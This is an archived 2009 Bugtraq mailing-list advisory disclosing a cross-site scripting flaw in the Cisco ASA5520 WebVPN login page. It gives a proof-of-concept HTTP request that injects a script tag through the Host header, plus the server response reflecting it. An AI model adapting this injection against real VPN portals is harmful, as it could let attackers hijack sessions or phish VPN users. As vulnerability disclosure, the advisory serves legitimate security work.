Cisco ASA5520 Web VPN Host Header XSS

To: bugtraq <bugtraq@xxxxxxxxxxxxxxxxx>, fd <full-disclosure@xxxxxxxxxxxxxxxxx>
Subject: Cisco ASA5520 Web VPN Host Header XSS
From: Bugs NotHugs <bugsnothugs@xxxxxxxxx>
Date: Tue, 31 Mar 2009 04:17:54 -0600
Dkim-signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:mime-version:received:date:message-id:subject :from:to:content-type:content-transfer-encoding; bh=VXJptxkpBt2qHMDiA9lM3D52B5umWzCkzc1tbd1hC/E=; b=UFrywcab2AxaTV1hhFwzrTHsgo1actR0QlWn3o+zqf7fDkarJ3XVVloeaMvvEgNkEz QfsQ/r/EDgsL0hKH3ksNzICjM2uo9Ql5s8xelOz/+Qq10h5G72CIhj0Xunmb34Why3ea 5qcK5koHXwqHD1OKWDj4D+4/9EKwCS8TtAlTA=
Domainkey-signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=mime-version:date:message-id:subject:from:to:content-type :content-transfer-encoding; b=PrSS3KpeujDds+yIZA/8sClyKEUXxwr7gOtJIvQBxPSQM9GXttYKWBSlXtdZjC7zq0 H0tq8RJojZh87EJVp0H3i08HB4KiSQkS74jvB4kK3OyV8NmtHcpDKnmdCdM7RylGGynW 6cTJqEqmtIrNCbZYCcogRnEV6Wpz1i+vaff+U=
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

- Cisco ASA5520 Web VPN Host Header XSS

- Description

Cross-site scripting.

- Product

Cisco, ASA5520, IOS 7.2(2)22

- PoC

Modified request:

POST /+webvpn+/index.html HTTP/1.1
Host: "'><script>alert('BugsNotHugs')</script><meta httpequiv=""
content='"www.owasp.org
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/x-shockwave-flash, application/vnd.ms-excel,
application/vnd.ms-powerpoint, application/msword, */*
Referer: https://198.133.219.23/+webvpn+/index.html
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/1.3 (compatible; MSIE 3.0; Windows 3.11; .NET CLR 1.1.1032)
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: webvpnlogin=1
Content-Length: 66

username=psirt&password=easy&Login=Login&next=&tgroup=&tgcookieset=


Response:

HTTP/1.1 200 OK
Server: Virata-EmWeb/R6_2_0
Content-Type: text/html
Cache-Control: max-age=0
Set-Cookie: webvpn=; expires=Thu, 01 Jan 1970 22:00:00 GMT; path=/
Set-Cookie: webvpnlogin=1
Content-Length: 5556

<html>
<!--
  Copyright (c) 2004, 2005 by Cisco Systems, Inc.
  All rights reserved.
 -->
<head>


<META http-equiv="PICS-Label" content='(PICS-1.1
"http://www.rsac.org/ratingsv01.html"; l gen true comment "RSACi North
America Server" for
"http://";'><script>alert('BugsNotHugs')</script><meta httpequiv=""
content='"www.owasp.org/+webvpn+/index.html" on
"2000.11.02T23:36-0800" r (n 0 s 0 v 0 l 0))'>

<meta http-equiv="Window-target" content="_top">
<title>WebVPN Service</title>


- Solution

None

- Timeline

2007-09-17: Vulnerability Discovered
2008-02-15: Disclosed to Vendor (auto-reply)
2009-04-02: Disclosed to Public (XSS is so 1999)

-- 

BugsNotHugs
Shared Vulnerability Disclosure Account

Follow-Ups:
- RE: Cisco ASA5520 Web VPN Host Header XSS
  - From: Mark-David McLaughlin (marmclau)

Prev by Date: Re: [ECHO_ADV_103$2009] taifajobs <= 1.0 (jobid) Remote SQL Injection Vulnerability
Next by Date: [Positive Technologies SA 2009-09] Trend Micro Internet Security Pro 2009 tmactmon.sys Priviliege Escalation Vulnerabilities
Previous by thread: aspWebCalendar Free Edition bug
Next by thread: RE: Cisco ASA5520 Web VPN Host Header XSS
Index(es):
- Date
- Thread